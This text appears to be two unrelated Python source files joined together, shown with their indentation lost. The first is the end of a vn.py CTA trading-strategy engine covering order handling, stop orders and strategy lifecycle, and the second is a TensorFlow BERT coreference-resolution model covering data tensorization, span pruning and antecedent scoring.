self.offset_converter.update_order_request(req, vt_orderid)
# Save relationship between orderid and strategy.
self.orderid_strategy_map[vt_orderid] = strategy
self.strategy_orderid_map[strategy.strategy_name].add(vt_orderid)
return vt_orderids
def send_limit_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Send a limit order to server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.LIMIT,
lock
)
def send_server_stop_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Send a stop order to server.
Should only be used if stop order supported
on the trading server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.STOP,
lock
)
def send_local_stop_order(
self,
strategy: CtaTemplate,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Create a new local stop order.
"""
self.stop_order_count += 1
stop_orderid = f"{STOPORDER_PREFIX}.{self.stop_order_count}"
stop_order = StopOrder(
vt_symbol=strategy.vt_symbol,
direction=direction,
offset=offset,
price=price,
volume=volume,
stop_orderid=stop_orderid,
strategy_name=strategy.strategy_name,
lock=lock
)
self.stop_orders[stop_orderid] = stop_order
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
vt_orderids.add(stop_orderid)
self.call_strategy_func(strategy, strategy.on_stop_order, stop_order)
self.put_stop_order_event(stop_order)
return stop_orderid
def cancel_server_order(self, strategy: CtaTemplate, vt_orderid: str):
"""
Cancel existing order by vt_orderid.
"""
order = self.main_engine.get_order(vt_orderid)
if not order:
self.write_log(f"撤单失败,找不到委托{vt_orderid}", strategy)
return
req = order.create_cancel_request()
self.main_engine.cancel_order(req, order.gateway_name)
def cancel_local_stop_order(self, strategy: CtaTemplate, stop_orderid: str):
"""
Cancel a local stop order.
"""
stop_order = self.stop_orders.get(stop_orderid, None)
if not stop_order:
return
strategy = self.strategies[stop_order.strategy_name]
# Remove from relation map.
self.stop_orders.pop(stop_orderid)
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if stop_orderid in vt_orderids:
vt_orderids.remove(stop_orderid)
# Change stop order status to cancelled and update to strategy.
stop_order.status = StopOrderStatus.CANCELLED
self.call_strategy_func(strategy, strategy.on_stop_order, stop_order)
self.put_stop_order_event(stop_order)
def send_order(
self,
strategy: CtaTemplate,
direction: Direction,
offset: Offset,
price: float,
volume: float,
stop: bool,
lock: bool
):
"""
"""
contract = self.main_engine.get_contract(strategy.vt_symbol)
if not contract:
self.write_log(f"委托失败,找不到合约:{strategy.vt_symbol}", strategy)
return ""
# Round order price and volume to nearest incremental value
price = round_to(price, contract.pricetick)
volume = round_to(volume, contract.min_volume)
if stop:
if contract.stop_supported:
return self.send_server_stop_order(strategy, contract, direction, offset, price, volume, lock)
else:
return self.send_local_stop_order(strategy, direction, offset, price, volume, lock)
else:
return self.send_limit_order(strategy, contract, direction, offset, price, volume, lock)
def cancel_order(self, strategy: CtaTemplate, vt_orderid: str):
"""
"""
if vt_orderid.startswith(STOPORDER_PREFIX):
self.cancel_local_stop_order(strategy, vt_orderid)
else:
self.cancel_server_order(strategy, vt_orderid)
def cancel_all(self, strategy: CtaTemplate):
"""
Cancel all active orders of a strategy.
"""
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if not vt_orderids:
return
for vt_orderid in copy(vt_orderids):
self.cancel_order(strategy, vt_orderid)
def get_engine_type(self):
""""""
return self.engine_type
def load_bar(
self,
vt_symbol: str,
days: int,
interval: Interval,
callback: Callable[[BarData], None]
):
""""""
symbol, exchange = extract_vt_symbol(vt_symbol)
end = datetime.now()
start = end - timedelta(days)
# Query bars from RQData by default, if not found, load from database.
bars = self.query_bar_from_rq(symbol, exchange, interval, start, end)
if not bars:
bars = database_manager.load_bar_data(
symbol=symbol,
exchange=exchange,
interval=interval,
start=start,
end=end,
)
for bar in bars:
callback(bar)
def load_tick(
self,
vt_symbol: str,
days: int,
callback: Callable[[TickData], None]
):
""""""
symbol, exchange = extract_vt_symbol(vt_symbol)
end = datetime.now()
start = end - timedelta(days)
ticks = database_manager.load_tick_data(
symbol=symbol,
exchange=exchange,
start=start,
end=end,
)
for tick in ticks:
callback(tick)
def call_strategy_func(
self, strategy: CtaTemplate, func: Callable, params: Any = None
):
"""
Call function of a strategy and catch any exception raised.
"""
try:
if params:
func(params)
else:
func()
except Exception:
strategy.trading = False
strategy.inited = False
msg = f"触发异常已停止\n{traceback.format_exc()}"
self.write_log(msg, strategy)
def add_strategy(
self, class_name: str, strategy_name: str, vt_symbol: str, setting: dict
):
"""
Add a new strategy.
"""
if strategy_name in self.strategies:
self.write_log(f"创建策略失败,存在重名{strategy_name}")
return
strategy_class = self.classes.get(class_name, None)
if not strategy_class:
self.write_log(f"创建策略失败,找不到策略类{class_name}")
return
strategy = strategy_class(self, strategy_name, vt_symbol, setting)
self.strategies[strategy_name] = strategy
# Add vt_symbol to strategy map.
strategies = self.symbol_strategy_map[vt_symbol]
strategies.append(strategy)
# Update to setting file.
self.update_strategy_setting(strategy_name, setting)
self.put_strategy_event(strategy)
def init_strategy(self, strategy_name: str):
"""
Init a strategy.
"""
self.init_queue.put(strategy_name)
if not self.init_thread:
self.init_thread = Thread(target=self._init_strategy)
self.init_thread.start()
def _init_strategy(self):
"""
Init strategies in queue.
"""
while not self.init_queue.empty():
strategy_name = self.init_queue.get()
strategy = self.strategies[strategy_name]
if strategy.inited:
self.write_log(f"{strategy_name}已经完成初始化,禁止重复操作")
continue
self.write_log(f"{strategy_name}开始执行初始化")
# Call on_init function of strategy
self.call_strategy_func(strategy, strategy.on_init)
# Restore strategy data(variables)
data = self.strategy_data.get(strategy_name, None)
if data:
for name in strategy.variables:
value = data.get(name, None)
if value:
setattr(strategy, name, value)
# Subscribe market data
contract = self.main_engine.get_contract(strategy.vt_symbol)
if contract:
req = SubscribeRequest(
symbol=contract.symbol, exchange=contract.exchange)
self.main_engine.subscribe(req, contract.gateway_name)
else:
self.write_log(f"行情订阅失败,找不到合约{strategy.vt_symbol}", strategy)
# Put event to update init completed status.
strategy.inited = True
self.put_strategy_event(strategy)
self.write_log(f"{strategy_name}初始化完成")
self.init_thread = None
def start_strategy(self, strategy_name: str):
"""
Start a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.inited:
self.write_log(f"策略{strategy.strategy_name}启动失败,请先初始化")
return
if strategy.trading:
self.write_log(f"{strategy_name}已经启动,请勿重复操作")
return
self.call_strategy_func(strategy, strategy.on_start)
strategy.trading = True
self.put_strategy_event(strategy)
def stop_strategy(self, strategy_name: str):
"""
Stop a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.trading:
return
# Call on_stop function of the strategy
self.call_strategy_func(strategy, strategy.on_stop)
# Change trading status of strategy to False
strategy.trading = False
# Cancel all orders of the strategy
self.cancel_all(strategy)
# Sync strategy variables to data file
self.sync_strategy_data(strategy)
# Update GUI
self.put_strategy_event(strategy)
def edit_strategy(self, strategy_name: str, setting: dict):
"""
Edit parameters of a strategy.
"""
strategy = self.strategies[strategy_name]
strategy.update_setting(setting)
self.update_strategy_setting(strategy_name, setting)
self.put_strategy_event(strategy)
def remove_strategy(self, strategy_name: str):
"""
Remove a strategy.
"""
strategy = self.strategies[strategy_name]
if strategy.trading:
self.write_log(f"策略{strategy.strategy_name}移除失败,请先停止")
return
# Remove setting
self.remove_strategy_setting(strategy_name)
# Remove from symbol strategy map
strategies = self.symbol_strategy_map[strategy.vt_symbol]
strategies.remove(strategy)
# Remove from active orderid map
if strategy_name in self.strategy_orderid_map:
vt_orderids = self.strategy_orderid_map.pop(strategy_name)
# Remove vt_orderid strategy map
for vt_orderid in vt_orderids:
if vt_orderid in self.orderid_strategy_map:
self.orderid_strategy_map.pop(vt_orderid)
# Remove from strategies
self.strategies.pop(strategy_name)
return True
def load_strategy_class(self):
"""
Load strategy class from source code.
"""
path1 = Path(__file__).parent.joinpath("strategies")
self.load_strategy_class_from_folder(
path1, "vnpy.app.cta_strategy.strategies")
path2 = Path.cwd().joinpath("strategies")
self.load_strategy_class_from_folder(path2, "strategies")
self.load_strategy_class_from_external('QAMagicTrade')
def load_strategy_class_from_external(self,module_name: str = "" ):
"""
load strategy class from external module
"""
try:
module = importlib.import_module(module_name)
module_strategy_list = module.vnpy_get_strategylist()
for value in module_strategy_list:
if (isinstance(value, type) and issubclass(value, CtaTemplate) and value is not CtaTemplate):
self.classes[value.__name__] = value
except: # noqa
msg = f"策略文件{module_name}外部加载失败,触发异常:\n{traceback.format_exc()}"
self.write_log(msg)
def load_strategy_class_from_folder(self, path: Path, module_name: str = ""):
"""
Load strategy class from certain folder.
"""
for dirpath, dirnames, filenames in os.walk(str(path)):
for filename in filenames:
if filename.endswith(".py"):
strategy_module_name = ".".join(
[module_name, filename.replace(".py", "")])
self.load_strategy_class_from_module(strategy_module_name)
def load_strategy_class_from_module(self, module_name: str):
"""
Load strategy class from module file.
"""
try:
module = importlib.import_module(module_name)
for name in dir(module):
value = getattr(module, name)
if (isinstance(value, type) and issubclass(value, CtaTemplate) and value is not CtaTemplate):
self.classes[value.__name__] = value
except: # noqa
msg = f"策略文件{module_name}加载失败,触发异常:\n{traceback.format_exc()}"
self.write_log(msg)
def load_strategy_data(self):
"""
Load strategy data from json file.
"""
self.strategy_data = load_json(self.data_filename)
def sync_strategy_data(self, strategy: CtaTemplate):
"""
Sync strategy data into json file.
"""
data = strategy.get_variables()
data.pop("inited") # Strategy status (inited, trading) should not be synced.
data.pop("trading")
self.strategy_data[strategy.strategy_name] = data
save_json(self.data_filename, self.strategy_data)
def get_all_strategy_class_names(self):
"""
Return names of strategy classes loaded.
"""
return list(self.classes.keys())
def get_strategy_class_parameters(self, class_name: str):
"""
Get default parameters of a strategy class.
"""
strategy_class = self.classes[class_name]
parameters = {}
for name in strategy_class.parameters:
parameters[name] = getattr(strategy_class, name)
return parameters
def get_strategy_parameters(self, strategy_name):
"""
Get parameters of a strategy.
"""
strategy = self.strategies[strategy_name]
return strategy.get_parameters()
def init_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.init_strategy(strategy_name)
def start_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.start_strategy(strategy_name)
def stop_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.stop_strategy(strategy_name)
def load_strategy_setting(self):
"""
Load setting file.
"""
self.strategy_setting = load_json(self.setting_filename)
for strategy_name, strategy_config in self.strategy_setting.items():
self.add_strategy(
strategy_config["class_name"],
strategy_name,
strategy_config["vt_symbol"],
strategy_config["setting"]
)
def update_strategy_setting(self, strategy_name: str, setting: dict):
"""
Update setting file.
"""
strategy = self.strategies[strategy_name]
self.strategy_setting[strategy_name] = {
"class_name": strategy.__class__.__name__,
"vt_symbol": strategy.vt_symbol,
"setting": setting,
}
save_json(self.setting_filename, self.strategy_setting)
def remove_strategy_setting(self, strategy_name: str):
"""
Update setting file.
"""
if strategy_name not in self.strategy_setting:
return
self.strategy_setting.pop(strategy_name)
save_json(self.setting_filename, self.strategy_setting)
def put_stop_order_event(self, stop_order: StopOrder):
"""
Put an event to update stop order status.
"""
event = Event(EVENT_CTA_STOPORDER, stop_order)
self.event_engine.put(event)
def put_strategy_event(self, strategy: CtaTemplate):
"""
Put an event to update strategy status.
"""
data = strategy.get_data()
event = Event(EVENT_CTA_STRATEGY, data)
self.event_engine.put(event)
def write_log(self, msg: str, strategy: CtaTemplate = None):
"""
Create cta engine log event.
"""
if strategy:
msg = f"{strategy.strategy_name}: {msg}"
log = LogData(msg=msg, gateway_name="CtaStrategy")
event = Event(type=EVENT_CTA_LOG, data=log)
self.event_engine.put(event)
def send_email(self, msg: str, strategy: CtaTemplate = None):
"""
Send email to default receiver.
"""
if strategy:
subject = f"{strategy.strategy_name}"
else:
subject = "CTA策略引擎"
self.main_engine.send_email(subject, msg)
|
independent.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import random
import math
import json
import threading
import numpy as np
import tensorflow as tf
import util
import coref_ops
import conll
import metrics
import optimization
from bert import tokenization
from bert import modeling
from pytorch_to_tf import load_from_pytorch_checkpoint
class CorefModel(object):
def __init__(self, config):
self.config = config
self.max_segment_len = config['max_segment_len']
self.max_span_width = config["max_span_width"]
self.genres = { g:i for i,g in enumerate(config["genres"]) }
self.subtoken_maps = {}
self.gold = {}
self.eval_data = None # Load eval data lazily.
self.bert_config = modeling.BertConfig.from_json_file(config["bert_config_file"])
self.tokenizer = tokenization.FullTokenizer(
vocab_file=config['vocab_file'], do_lower_case=False)
input_props = []
input_props.append((tf.int32, [None, None])) # input_ids.
input_props.append((tf.int32, [None, None])) # input_mask
input_props.append((tf.int32, [None])) # Text lengths.
input_props.append((tf.int32, [None, None])) # Speaker IDs.
input_props.append((tf.int32, [])) # Genre.
input_props.append((tf.bool, [])) # Is training.
input_props.append((tf.int32, [None])) # Gold starts.
input_props.append((tf.int32, [None])) # Gold ends.
input_props.append((tf.int32, [None])) # Cluster ids.
input_props.append((tf.int32, [None])) # Sentence Map
self.queue_input_tensors = [tf.placeholder(dtype, shape) for dtype, shape in input_props]
dtypes, shapes = zip(*input_props)
queue = tf.PaddingFIFOQueue(capacity=10, dtypes=dtypes, shapes=shapes)
self.enqueue_op = queue.enqueue(self.queue_input_tensors)
self.input_tensors = queue.dequeue()
self.predictions, self.loss = self.get_predictions_and_loss(*self.input_tensors)
# bert stuff
tvars = tf.trainable_variables()
# If you're using TF weights only, tf_checkpoint and init_checkpoint can be the same
# Get the assignment map from the tensorflow checkpoint. Depending on the extension, use TF/Pytorch to load weights.
assignment_map, initialized_variable_names = modeling.get_assignment_map_from_checkpoint(tvars, config['tf_checkpoint'])
init_from_checkpoint = tf.train.init_from_checkpoint if config['init_checkpoint'].endswith('ckpt') else load_from_pytorch_checkpoint
init_from_checkpoint(config['init_checkpoint'], assignment_map)
print("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
# tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
# init_string)
print(" name = %s, shape = %s%s" % (var.name, var.shape, init_string))
num_train_steps = int(
self.config['num_docs'] * self.config['num_epochs'])
num_warmup_steps = int(num_train_steps * 0.1)
self.global_step = tf.train.get_or_create_global_step()
self.train_op = optimization.create_custom_optimizer(tvars,
self.loss, self.config['bert_learning_rate'], self.config['task_learning_rate'],
num_train_steps, num_warmup_steps, False, self.global_step, freeze=-1,
task_opt=self.config['task_optimizer'], eps=config['adam_eps'])
def start_enqueue_thread(self, session):
with open(self.config["train_path"]) as f:
train_examples = [json.loads(jsonline) for jsonline in f.readlines()]
def _enqueue_loop():
while True:
random.shuffle(train_examples)
if self.config['single_example']:
for example in train_examples:
tensorized_example = self.tensorize_example(example, is_training=True)
feed_dict = dict(zip(self.queue_input_tensors, tensorized_example))
session.run(self.enqueue_op, feed_dict=feed_dict)
else:
examples = []
for example in train_examples:
tensorized = self.tensorize_example(example, is_training=True)
if type(tensorized) is not list:
tensorized = [tensorized]
examples += tensorized
random.shuffle(examples)
print('num examples', len(examples))
for example in examples:
feed_dict = dict(zip(self.queue_input_tensors, example))
session.run(self.enqueue_op, feed_dict=feed_dict)
enqueue_thread = threading.Thread(target=_enqueue_loop)
enqueue_thread.daemon = True
enqueue_thread.start()
def restore(self, session):
# Don't try to restore unused variables from the TF-Hub ELMo module.
vars_to_restore = [v for v in tf.global_variables() ]
saver = tf.train.Saver(vars_to_restore)
checkpoint_path = os.path.join(self.config["log_dir"], "model.max.ckpt")
print("Restoring from {}".format(checkpoint_path))
session.run(tf.global_variables_initializer())
saver.restore(session, checkpoint_path)
def tensorize_mentions(self, mentions):
if len(mentions) > 0:
starts, ends = zip(*mentions)
else:
starts, ends = [], []
return np.array(starts), np.array(ends)
def tensorize_span_labels(self, tuples, label_dict):
if len(tuples) > 0:
starts, ends, labels = zip(*tuples)
else:
starts, ends, labels = [], [], []
return np.array(starts), np.array(ends), np.array([label_dict[c] for c in labels])
def get_speaker_dict(self, speakers):
speaker_dict = {'UNK': 0, '[SPL]': 1}
for s in speakers:
if s not in speaker_dict and len(speaker_dict) < self.config['max_num_speakers']:
speaker_dict[s] = len(speaker_dict)
return speaker_dict
def tensorize_example(self, example, is_training):
clusters = example["clusters"]
gold_mentions = sorted(tuple(m) for m in util.flatten(clusters))
gold_mention_map = {m:i for i,m in enumerate(gold_mentions)}
cluster_ids = np.zeros(len(gold_mentions))
for cluster_id, cluster in enumerate(clusters):
for mention in cluster:
cluster_ids[gold_mention_map[tuple(mention)]] = cluster_id + 1
sentences = example["sentences"]
num_words = sum(len(s) for s in sentences)
speakers = example["speakers"]
# assert num_words == len(speakers), (num_words, len(speakers))
speaker_dict = self.get_speaker_dict(util.flatten(speakers))
sentence_map = example['sentence_map']
max_sentence_length = self.max_segment_len
text_len = np.array([len(s) for s in sentences])
input_ids, input_mask, speaker_ids = [], [], []
for i, (sentence, speaker) in enumerate(zip(sentences, speakers)):
sent_input_ids = self.tokenizer.convert_tokens_to_ids(sentence)
sent_input_mask = [1] * len(sent_input_ids)
sent_speaker_ids = [speaker_dict.get(s, 3) for s in speaker]
while len(sent_input_ids) < max_sentence_length:
sent_input_ids.append(0)
sent_input_mask.append(0)
sent_speaker_ids.append(0)
input_ids.append(sent_input_ids)
speaker_ids.append(sent_speaker_ids)
input_mask.append(sent_input_mask)
input_ids = np.array(input_ids)
input_mask = np.array(input_mask)
speaker_ids = np.array(speaker_ids)
assert num_words == np.sum(input_mask), (num_words, np.sum(input_mask))
doc_key = example["doc_key"]
self.subtoken_maps[doc_key] = example.get("subtoken_map", None)
self.gold[doc_key] = example["clusters"]
genre = self.genres.get(doc_key[:2], 0)
gold_starts, gold_ends = self.tensorize_mentions(gold_mentions)
example_tensors = (input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map)
if is_training and len(sentences) > self.config["max_training_sentences"]:
if self.config['single_example']:
return self.truncate_example(*example_tensors)
else:
offsets = range(self.config['max_training_sentences'], len(sentences), self.config['max_training_sentences'])
tensor_list = [self.truncate_example(*(example_tensors + (offset,))) for offset in offsets]
return tensor_list
else:
return example_tensors
def truncate_example(self, input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map, sentence_offset=None):
max_training_sentences = self.config["max_training_sentences"]
num_sentences = input_ids.shape[0]
assert num_sentences > max_training_sentences
sentence_offset = random.randint(0, num_sentences - max_training_sentences) if sentence_offset is None else sentence_offset
word_offset = text_len[:sentence_offset].sum()
num_words = text_len[sentence_offset:sentence_offset + max_training_sentences].sum()
input_ids = input_ids[sentence_offset:sentence_offset + max_training_sentences, :]
input_mask = input_mask[sentence_offset:sentence_offset + max_training_sentences, :]
speaker_ids = speaker_ids[sentence_offset:sentence_offset + max_training_sentences, :]
text_len = text_len[sentence_offset:sentence_offset + max_training_sentences]
sentence_map = sentence_map[word_offset: word_offset + num_words]
gold_spans = np.logical_and(gold_ends >= word_offset, gold_starts < word_offset + num_words)
gold_starts = gold_starts[gold_spans] - word_offset
gold_ends = gold_ends[gold_spans] - word_offset
cluster_ids = cluster_ids[gold_spans]
return input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map
def get_candidate_labels(self, candidate_starts, candidate_ends, labeled_starts, labeled_ends, labels):
same_start = tf.equal(tf.expand_dims(labeled_starts, 1), tf.expand_dims(candidate_starts, 0)) # [num_labeled, num_candidates]
same_end = tf.equal(tf.expand_dims(labeled_ends, 1), tf.expand_dims(candidate_ends, 0)) # [num_labeled, num_candidates]
same_span = tf.logical_and(same_start, same_end) # [num_labeled, num_candidates]
candidate_labels = tf.matmul(tf.expand_dims(labels, 0), tf.to_int32(same_span)) # [1, num_candidates]
candidate_labels = tf.squeeze(candidate_labels, 0) # [num_candidates]
return candidate_labels
def get_dropout(self, dropout_rate, is_training):
return 1 - (tf.to_float(is_training) * dropout_rate)
def coarse_to_fine_pruning(self, top_span_emb, top_span_mention_scores, c):
k = util.shape(top_span_emb, 0)
top_span_range = tf.range(k) # [k]
antecedent_offsets = tf.expand_dims(top_span_range, 1) - tf.expand_dims(top_span_range, 0) # [k, k]
antecedents_mask = antecedent_offsets >= 1 # [k, k]
fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.expand_dims(top_span_mention_scores, 0) # [k, k]
fast_antecedent_scores += tf.log(tf.to_float(antecedents_mask)) # [k, k]
fast_antecedent_scores += self.get_fast_antecedent_scores(top_span_emb) # [k, k]
if self.config['use_prior']:
antecedent_distance_buckets = self.bucket_distance(antecedent_offsets) # [k, c]
distance_scores = util.projection(tf.nn.dropout(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]], initializer=tf.truncated_normal_initializer(stddev=0.02)), self.dropout), 1, initializer=tf.truncated_normal_initializer(stddev=0.02)) #[10, 1]
antecedent_distance_scores = tf.gather(tf.squeeze(distance_scores, 1), antecedent_distance_buckets) # [k, c]
fast_antecedent_scores += antecedent_distance_scores
_, top_antecedents = tf.nn.top_k(fast_antecedent_scores, c, sorted=False) # [k, c]
top_antecedents_mask = util.batch_gather(antecedents_mask, top_antecedents) # [k, c]
top_fast_antecedent_scores = util.batch_gather(fast_antecedent_scores, top_antecedents) # [k, c]
top_antecedent_offsets = util.batch_gather(antecedent_offsets, top_antecedents) # [k, c]
return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
def get_predictions_and_loss(self, input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map):
model = modeling.BertModel(
config=self.bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
use_one_hot_embeddings=False,
scope='bert')
all_encoder_layers = model.get_all_encoder_layers()
mention_doc = model.get_sequence_output()
self.dropout = self.get_dropout(self.config["dropout_rate"], is_training)
num_sentences = tf.shape(mention_doc)[0]
max_sentence_length = tf.shape(mention_doc)[1]
mention_doc = self.flatten_emb_by_sentence(mention_doc, input_mask)
num_words = util.shape(mention_doc, 0)
antecedent_doc = mention_doc
flattened_sentence_indices = sentence_map
candidate_starts = tf.tile(tf.expand_dims(tf.range(num_words), 1), [1, self.max_span_width]) # [num_words, max_span_width]
candidate_ends = candidate_starts + tf.expand_dims(tf.range(self.max_span_width), 0) # [num_words, max_span_width]
candidate_start_sentence_indices = tf.gather(flattened_sentence_indices, candidate_starts) # [num_words, max_span_width]
candidate_end_sentence_indices = tf.gather(flattened_sentence_indices, tf.minimum(candidate_ends, num_words - 1)) # [num_words, max_span_width]
candidate_mask = tf.logical_and(candidate_ends < num_words, tf.equal(candidate_start_sentence_indices, candidate_end_sentence_indices)) # [num_words, max_span_width]
flattened_candidate_mask = tf.reshape(candidate_mask, [-1]) # [num_words * max_span_width]
candidate_starts = tf.boolean_mask(tf.reshape(candidate_starts, [-1]), flattened_candidate_mask) # [num_candidates]
candidate_ends = tf.boolean_mask(tf.reshape(candidate_ends, [-1]), flattened_candidate_mask) # [num_candidates]
candidate_sentence_indices = tf.boolean_mask(tf.reshape(candidate_start_sentence_indices, [-1]), flattened_candidate_mask) # [num_candidates]
candidate_cluster_ids = self.get_candidate_labels(candidate_starts, candidate_ends, gold_starts, gold_ends, cluster_ids) # [num_candidates]
candidate_span_emb = self.get_span_emb(mention_doc, mention_doc, candidate_starts, candidate_ends) # [num_candidates, emb]
candidate_mention_scores = self.get_mention_scores(candidate_span_emb, candidate_starts, candidate_ends)
candidate_mention_scores = tf.squeeze(candidate_mention_scores, 1) # [k]
# beam size
k = tf.minimum(3900, tf.to_int32(tf.floor(tf.to_float(num_words) * self.config["top_span_ratio"])))
c = tf.minimum(self.config["max_top_antecedents"], k)
# pull from beam
top_span_indices = coref_ops.extract_spans(tf.expand_dims(candidate_mention_scores, 0),
tf.expand_dims(candidate_starts, 0),
tf.expand_dims(candidate_ends, 0),
tf.expand_dims(k, 0),
num_words,
True) # [1, k]
top_span_indices.set_shape([1, None])
top_span_indices = tf.squeeze(top_span_indices, 0) # [k]
top_span_starts = tf.gather(candidate_starts, top_span_indices) # [k]
top_span_ends = tf.gather(candidate_ends, top_span_indices) # [k]
top_span_emb = tf.gather(candidate_span_emb, top_span_indices) # [k, emb]
top_span_cluster_ids = tf.gather(candidate_cluster_ids, top_span_indices) # [k]
top_span_mention_scores = tf.gather(candidate_mention_scores, top_span_indices) # [k]
genre_emb = tf.gather(tf.get_variable("genre_embeddings", [len(self.genres), self.config["feature_size"]], initializer=tf.truncated_normal_initializer(stddev=0.02)), genre) # [emb]
if self.config['use_metadata']:
speaker_ids = self.flatten_emb_by_sentence(speaker_ids, input_mask)
top_span_speaker_ids = tf.gather(speaker_ids, top_span_starts) # [k]i
else:
top_span_speaker_ids = None
dummy_scores = tf.zeros([k, 1]) # [k, 1]
top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.coarse_to_fine_pruning(top_span_emb, top_span_mention_scores, c)
num_segs, seg_len = util.shape(input_ids, 0), util.shape(input_ids, 1)
word_segments = tf.tile(tf.expand_dims(tf.range(0, num_segs), 1), [1, seg_len])
flat_word_segments = tf.boolean_mask(tf.reshape(word_segments, [-1]), tf.reshape(input_mask, [-1]))
mention_segments = tf.expand_dims(tf.gather(flat_word_segments, top_span_starts), 1) # [k, 1]
antecedent_segments = tf.gather(flat_word_segments, tf.gather(top_span_starts, top_antecedents)) #[k, c]
segment_distance = tf.clip_by_value(mention_segments - antecedent_segments, 0, self.config['max_training_sentences'] - 1) if self.config['use_segment_distance'] else None #[k, c]
if self.config['fine_grained']:
for i in range(self.config["coref_depth"]):
with tf.variable_scope("coref_layer", reuse=(i > 0)):
top_antecedent_emb = tf.gather(top_span_emb, top_antecedents) # [k, c, emb]
top_antecedent_scores = top_fast_antecedent_scores + self.get_slow_antecedent_scores(top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance) # [k, c]
top_antecedent_weights = tf.nn.softmax(tf.concat([dummy_scores, top_antecedent_scores], 1)) # [k, c + 1]
top_antecedent_emb = tf.concat([tf.expand_dims(top_span_emb, 1), top_antecedent_emb], 1) # [k, c + 1, emb]
attended_span_emb = tf.reduce_sum(tf.expand_dims(top_antecedent_weights, 2) * top_antecedent_emb, 1) # [k, emb]
with tf.variable_scope("f"):
f = tf.sigmoid(util.projection(tf.concat([top_span_emb, attended_span_emb], 1), util.shape(top_span_emb, -1))) # [k, emb]
top_span_emb = f * attended_span_emb + (1 - f) * top_span_emb # [k, emb]
else:
top_antecedent_scores = top_fast_antecedent_scores
top_antecedent_scores = tf.concat([dummy_scores, top_antecedent_scores], 1) # [k, c + 1]
top_antecedent_cluster_ids = tf.gather(top_span_cluster_ids, top_antecedents) # [k, c]
top_antecedent_cluster_ids += tf.to_int32(tf.log(tf.to_float(top_antecedents_mask))) # [k, c]
same_cluster_indicator = tf.equal(top_antecedent_cluster_ids, tf.expand_dims(top_span_cluster_ids, 1)) # [k, c]
non_dummy_indicator = tf.expand_dims(top_span_cluster_ids > 0, 1) # [k, 1]
pairwise_labels = tf.logical_and(same_cluster_indicator, non_dummy_indicator) # [k, c]
dummy_labels = tf.logical_not(tf.reduce_any(pairwise_labels, 1, keepdims=True)) # [k, 1]
top_antecedent_labels = tf.concat([dummy_labels, pairwise_labels], 1) # [k, c + 1]
loss = self.softmax_loss(top_antecedent_scores, top_antecedent_labels) # [k]
loss = tf.reduce_sum(loss) # []
return [candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores], loss
def get_span_emb(self, head_emb, context_outputs, span_starts, span_ends):
span_emb_list = []
span_start_emb = tf.gather(context_outputs, span_starts) # [k, emb]
span_emb_list.append(span_start_emb)
span_end_emb = tf.gather(context_outputs, span_ends) # [k, emb]
span_emb_list.append(span_end_emb)
span_width = 1 + span_ends - span_starts # [k]
if self.config["use_features"]:
span_width_index = span_width - 1 # [k]
span_width_emb = tf.gather(tf.get_variable("span_width_embeddings", [self.config["max_span_width"], self.config["feature_size"]], initializer=tf.truncated_normal_initializer(stddev=0.02)), span_width_index) # [k, emb]
span_width_emb = tf.nn.dropout(span_width_emb, self.dropout)
span_emb_list.append(span_width_emb)
if self.config["model_heads"]:
mention_word_scores = self.get_masked_mention_word_scores(context_outputs, span_starts, span_ends)
head_attn_reps = tf.matmul(mention_word_scores, context_outputs) # [K, T]
span_emb_list.append(head_attn_reps)
span_emb = tf.concat(span_emb_list, 1) # [k, emb]
return span_emb # [k, emb]
def get_mention_scores(self, span_emb, span_starts, span_ends):
with tf.variable_scope("mention_scores"):
span_scores = util.ffnn(span_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, 1]
if self.config['use_prior']:
span_width_emb = tf.get_variable("span_width_prior_embeddings", [self.config["max_span_width"], self.config["feature_size"]], initializer=tf.truncated_normal_initializer(stddev=0.02)) # [W, emb]
span_width_index = span_ends - span_starts # [NC]
with tf.variable_scope("width_scores"):
width_scores = util.ffnn(span_width_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [W, 1]
width_scores = tf.gather(width_scores, span_width_index)
span_scores += width_scores
return span_scores
def get_width_scores(self, doc, starts, ends):
distance = ends - starts
span_start_emb = tf.gather(doc, starts)
hidden = util.shape(doc, 1)
with tf.variable_scope('span_width'):
span_width_emb = tf.gather(tf.get_variable("start_width_embeddings", [self.config["max_span_width"], hidden], initializer=tf.truncated_normal_initializer(stddev=0.02)), distance) # [W, emb]
